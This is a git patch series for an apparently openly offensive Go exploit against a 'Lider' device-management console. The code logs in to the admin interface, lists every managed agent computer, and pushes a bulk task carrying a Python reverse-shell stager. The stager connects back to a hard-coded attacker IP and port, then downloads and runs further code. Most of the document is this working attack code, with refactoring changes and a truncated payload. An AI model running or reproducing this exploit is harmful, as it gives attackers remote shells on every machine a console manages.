From f8c0bef8b75bb0eddfb1d0d26185b5b0070c9583 Mon Sep 17 00:00:00 2001 From: KhanbalaRashidov Date: Thu, 8 Dec 2022 16:27:30 +0300 Subject: [PATCH 1/3] Edit Agent --- main.go | 7 +++---- user.go | 28 +++++++++++++--------------- 2 files changed, 16 insertions(+), 19 deletions(-) diff --git a/main.go b/main.go index bd8cc61..d970980 100644 --- a/main.go +++ b/main.go @@ -10,7 +10,7 @@ import ( var TARGET, LHOST, LPORT string -func main(){ +func main() { print_info("Starting the exploit") @@ -19,7 +19,7 @@ func main(){ LHOST = "172.26.64.120" LPORT = "4444" - TARGETURI := "http://192.168.179.134:8080/lider/config/configurations" + TARGETURI := "http://192.168.179.134:8080/lider/config/configurations" res, err := http.Get(TARGETURI) @@ -73,5 +73,4 @@ func main(){ cu.TriggerPayloadonAllAgents(agents) //fmt.Println(NewPayload()) - -} \ No newline at end of file +} diff --git a/user.go b/user.go index b6b9a17..0a359bf 100644 --- a/user.go +++ b/user.go @@ -11,38 +11,36 @@ import ( ) type ConsoleUser struct { - username []string - password []string + username []string + password []string cookieJar *cookiejar.Jar } -func (cu *ConsoleUser)Login() { +func (cu *ConsoleUser) Login() { print_info("Authentication to the console with credentials") time.Sleep(1) - options := cookiejar.Options{ - - } + options := cookiejar.Options{} - jar, err := cookiejar.New(&options) - if err != nil { - panic_with_msg("Something went wront", err) - } + jar, err := cookiejar.New(&options) + if err != nil { + panic_with_msg("Something went wront", err) + } cu.cookieJar = jar client := http.Client{Jar: cu.cookieJar} - resp, err := client.PostForm(fmt.Sprintf("http://%s:8080/login", TARGET), url.Values{ - "password": cu.password, - "username" : cu.username, + resp, err := client.PostForm(fmt.Sprintf("http://%s:8080/login", TARGET), url.Values{ + "password": cu.password, + "username": cu.username, }) if err != nil { panic_with_msg("Unable to login somehow. Dunno why", err) } defer resp.Body.Close() - + body, err := ioutil.ReadAll(resp.Body) if strings.Contains(string(body), "forgot_password") { @@ -50,4 +48,4 @@ func (cu *ConsoleUser)Login() { } print_good("Successfully authenticated to the administrator interface ! ") -} \ No newline at end of file +} From eca5179b65ec6df3544a549ef42e17e0abfc7f08 Mon Sep 17 00:00:00 2001 From: KhanbalaRashidov Date: Thu, 8 Dec 2022 16:28:39 +0300 Subject: [PATCH 2/3] edit --- agent.go | 142 ++++++++++++++++++++++++----------------------------- payload.go | 28 ----------- 2 files changed, 64 insertions(+), 106 deletions(-) delete mode 100644 payload.go diff --git a/agent.go b/agent.go index 5aba0c7..ca09a0e 100644 --- a/agent.go +++ b/agent.go @@ -12,94 +12,81 @@ import ( "time" ) -type Agents []struct { - DistinguishedName string `json:"distinguishedName"` - Ou interface{} `json:"ou"` - Cn string `json:"cn"` - UID string `json:"uid"` - Sn interface{} `json:"sn"` - O string `json:"o"` - UserPassword string `json:"userPassword"` - Parent interface{} `json:"parent"` - ParentName interface{} `json:"parentName"` - EntryUUID string `json:"entryUUID"` - HasSubordinates string `json:"hasSubordinates"` - Name string `json:"name"` - IconPath interface{} `json:"iconPath"` - ExpandedUser string `json:"expandedUser"` - Attributes struct { - Owner string `json:"owner"` - EntryUUID string `json:"entryUUID"` - StructuralObjectClass string `json:"structuralObjectClass"` - CreatorsName string `json:"creatorsName"` - UserPassword string `json:"userPassword"` - SubschemaSubentry string `json:"subschemaSubentry"` - Cn string `json:"cn"` - HasSubordinates string `json:"hasSubordinates"` - O string `json:"o"` - CreateTimestamp string `json:"createTimestamp"` - ModifyTimestamp string `json:"modifyTimestamp"` - UID string `json:"uid"` - EntryCSN string `json:"entryCSN"` - ModifiersName string `json:"modifiersName"` - LiderDeviceOSType string `json:"liderDeviceOSType"` - PwdChangedTime string `json:"pwdChangedTime"` - EntryDN string `json:"entryDN"` - } `json:"attributes"` - AttributesMultiValues struct { - Owner []string `json:"owner"` - EntryUUID []string `json:"entryUUID"` - StructuralObjectClass []string `json:"structuralObjectClass"` - CreatorsName []string `json:"creatorsName"` - UserPassword []string `json:"userPassword"` - SubschemaSubentry []string `json:"subschemaSubentry"` - ObjectClass []string `json:"objectClass"` - Cn []string `json:"cn"` - HasSubordinates []string `json:"hasSubordinates"` - O []string `json:"o"` - CreateTimestamp []string `json:"createTimestamp"` - ModifyTimestamp []string `json:"modifyTimestamp"` - UID []string `json:"uid"` - EntryCSN []string `json:"entryCSN"` - ModifiersName []string `json:"modifiersName"` - LiderDeviceOSType []string `json:"liderDeviceOSType"` - PwdChangedTime []string `json:"pwdChangedTime"` - EntryDN []string `json:"entryDN"` - } `json:"attributesMultiValues"` - Type string `json:"type"` - Priviliges interface{} `json:"priviliges"` - ChildEntries interface{} `json:"childEntries"` - TelephoneNumber interface{} `json:"telephoneNumber"` - HomePostalAddress interface{} `json:"homePostalAddress"` - CreateDateStr string `json:"createDateStr"` - Mail interface{} `json:"mail"` - SessionList interface{} `json:"sessionList"` - AgentListSize interface{} `json:"agentListSize"` - OnlineAgentListSize interface{} `json:"onlineAgentListSize"` - AgentList interface{} `json:"agentList"` - OnlineAgentList interface{} `json:"onlineAgentList"` - Online bool `json:"online"` +type Attributes struct { + Owner string `json:"owner"` + EntryUUID string `json:"entryUUID"` + StructuralObjectClass string `json:"structuralObjectClass"` + CreatorsName string `json:"creatorsName"` + UserPassword string `json:"userPassword"` + SubschemaSubentry string `json:"subschemaSubentry"` + Cn string `json:"cn"` + HasSubordinates string `json:"hasSubordinates"` + O string `json:"o"` + CreateTimestamp string `json:"createTimestamp"` + ModifyTimestamp string `json:"modifyTimestamp"` + UID string `json:"uid"` + EntryCSN string `json:"entryCSN"` + ModifiersName string `json:"modifiersName"` + LiderDeviceOSType string `json:"liderDeviceOSType"` + PwdChangedTime string `json:"pwdChangedTime"` + EntryDN string `json:"entryDN"` +} + +type AttributesMultiValues struct { + Attributes + ObjectClass []string `json:"objectClass"` } +type Agents []struct { + DistinguishedName string `json:"distinguishedName"` + Ou interface{} `json:"ou"` + Cn string `json:"cn"` + UID string `json:"uid"` + Sn interface{} `json:"sn"` + O string `json:"o"` + UserPassword string `json:"userPassword"` + Parent interface{} `json:"parent"` + ParentName interface{} `json:"parentName"` + EntryUUID string `json:"entryUUID"` + HasSubordinates string `json:"hasSubordinates"` + Name string `json:"name"` + IconPath interface{} `json:"iconPath"` + ExpandedUser string `json:"expandedUser"` + Attributes Attributes `json:"attributes"` + AttributesMultiValues AttributesMultiValues `json:"attributesMultiValues"` + Type string `json:"type"` + Priviliges interface{} `json:"priviliges"` + ChildEntries interface{} `json:"childEntries"` + TelephoneNumber interface{} `json:"telephoneNumber"` + HomePostalAddress interface{} `json:"homePostalAddress"` + CreateDateStr string `json:"createDateStr"` + Mail interface{} `json:"mail"` + SessionList interface{} `json:"sessionList"` + AgentListSize interface{} `json:"agentListSize"` + OnlineAgentListSize interface{} `json:"onlineAgentListSize"` + AgentList interface{} `json:"agentList"` + OnlineAgentList interface{} `json:"onlineAgentList"` + Online bool `json:"online"` +} -func (cu *ConsoleUser)NewAgents(agentLdapBaseDn string) *Agents{ +func (cu *ConsoleUser) NewAgents(agentLdapBaseDn string) *Agents { print_info("Getting all the active computers") client := http.Client{Jar: cu.cookieJar} - + v := url.Values{} v.Set("uid", agentLdapBaseDn) v.Set("type", "ORGANIZATIONAL_UNIT") v.Set("name", "Agents") v.Set("parent", "") - resp, err := client.PostForm(fmt.Sprintf("http://%s:8080/lider/computer/getOuDetails", TARGET), v) + resp, err := client.PostForm(fmt.Sprintf("http://%s:8080/lider/computer/getOuDetails", TARGET), v) if err != nil { panic_with_msg("Unable to login somehow. Dunno why", err) } defer resp.Body.Close() - + body, err := ioutil.ReadAll(resp.Body) agents := new(Agents) @@ -112,7 +99,7 @@ func (cu *ConsoleUser)NewAgents(agentLdapBaseDn string) *Agents{ return agents } -func (cu *ConsoleUser)TriggerPayloadonAllAgents(agents *Agents){ +func (cu *ConsoleUser) TriggerPayloadonAllAgents(agents *Agents) { a, err := json.Marshal(agents) @@ -159,22 +146,21 @@ func (cu *ConsoleUser)TriggerPayloadonAllAgents(agents *Agents){ }, "activationDate": null } - `, a, (rand.Intn(10000 - 100) + 1000), strings.Replace(NewPayload(), "\"", "\\\"", -1)) + `, a, (rand.Intn(10000-100) + 1000), strings.Replace(NewPayload(), "\"", "\\\"", -1)) client := http.Client{Jar: cu.cookieJar} - resp, err := client.Post(fmt.Sprintf("http://%s:8080/lider/task/execute", TARGET), "application/json", bytes.NewBuffer([]byte(godsJson))) + resp, err := client.Post(fmt.Sprintf("http://%s:8080/lider/task/execute", TARGET), "application/json", bytes.NewBuffer([]byte(godsJson))) if err != nil { panic_with_msg("Unable to triggger the bulk task endpoint", err) } defer resp.Body.Close() - + body, err := ioutil.ReadAll(resp.Body) - if strings.Contains(string(body), "Gonderildi"){ + if strings.Contains(string(body), "Gonderildi") { print_good("Hooold my beer ! Shell storm is coming.") } - -} \ No newline at end of file +} diff --git a/payload.go b/payload.go deleted file mode 100644 index 16f20e8..0000000 --- a/payload.go +++ /dev/null @@ -1,28 +0,0 @@ -package main - -import ( - "encoding/base64" - "fmt" -) - -func NewPayload() string{ - - template := fmt.Sprintf(` -import socket,zlib,base64,struct,time -for x in range(10): - try: - s=socket.socket(2,socket.SOCK_STREAM) - s.connect(('%s',%s)) - break - except: - time.sleep(5) -l=struct.unpack('>I',s.recv(4))[0] -d=s.recv(l) -while len(d) Date: Thu, 8 Dec 2022 16:32:24 +0300 Subject: [PATCH 3/3] Create payload.go edit --- payload.go | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 payload.go diff --git a/payload.go b/payload.go new file mode 100644 index 0000000..b28586f --- /dev/null +++ b/payload.go @@ -0,0 +1,28 @@ +package main + +import ( + "encoding/base64" + "fmt" +) + +func NewPayload() string { + + template := fmt.Sprintf(` +import socket,zlib,base64,struct,time +for x in range(10): + try: + s=socket.socket(2,socket.SOCK_STREAM) + s.connect(('%s',%s)) + break + except: + time.sleep(5) +l=struct.unpack('>I',s.recv(4))[0] +d=s.recv(l) +while len(d)